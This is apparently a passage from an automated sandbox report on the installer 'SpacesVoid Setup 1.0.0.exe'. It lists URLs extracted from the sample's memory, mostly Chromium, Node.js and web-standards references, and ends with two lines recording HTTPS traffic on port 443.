Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cpp
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903emulatePixelLocalStorageEmulate
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://jimmy.warting.se/opensource
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://no-color.org/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/download/release/v18.17.1/node-v18.17.1-headers.tar.gz
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/download/release/v18.17.1/node-v18.17.1.tar.gz
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/download/release/v18.17.1/node-v18.17.1.tar.gzhttps://nodejs.org/download/release
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/download/release/v18.17.1/win-x64/node.lib
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/en/docs/inspector
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/en/docs/inspectorFor
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/static/images/favicons/favicon.ico
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/static/images/favicons/favicon.icofaviconUrldevtoolsFrontendUrldevtoolsFrontendUr
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google.com
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://polymer-library.polymer-project.org
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://quiche.googlesource.com/quiche
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/site/gaviotachessuser/Home/endgame-tablebases-1
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://skia.org/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://source.corp.google.com/piper///depot/google3/third_party/tamachiyomi/README.md
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sourcemaps.info/spec.html
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sqlite.org/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://streams.spec.whatwg.org/#example-manual-write-with-backpressure
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2523123903.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2520626319.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2514151148.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2511492991.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2524752872.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2517672801.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2513588296.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2521839611.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2531854292.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2533173961.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2534558562.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2512248087.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2528074424.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2512863636.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2526381818.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2533173961.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2534558562.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2512248087.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2528074424.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2512863636.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2526381818.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#eqn-modulo
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2571162025.00000000055C9000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2568814877.00000000055C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-proxy-object-internal-methods-and-internal-slots-getprototypeof
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.es/ecma262/#table-typeof-operator-results
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#dom-urlsearchparams-urlsearchparams
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dom-performance-setresourcetimingbuffersize
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/uievents/#legacy-event-types)
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webassembly.github.io/spec/web-api
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webidl.spec.whatwg.org/#abstract-opdef-converttoint
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webidl.spec.whatwg.org/#abstract-opdef-integerpart
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webidl.spec.whatwg.org/#es-DOMString
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webidl.spec.whatwg.org/#es-dictionary
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5093566007214080
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5093566007214080ErrorEventInit
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5636954674692096
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5738264052891648
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8288.html#section-3
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.unicode.org/copyright.html.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
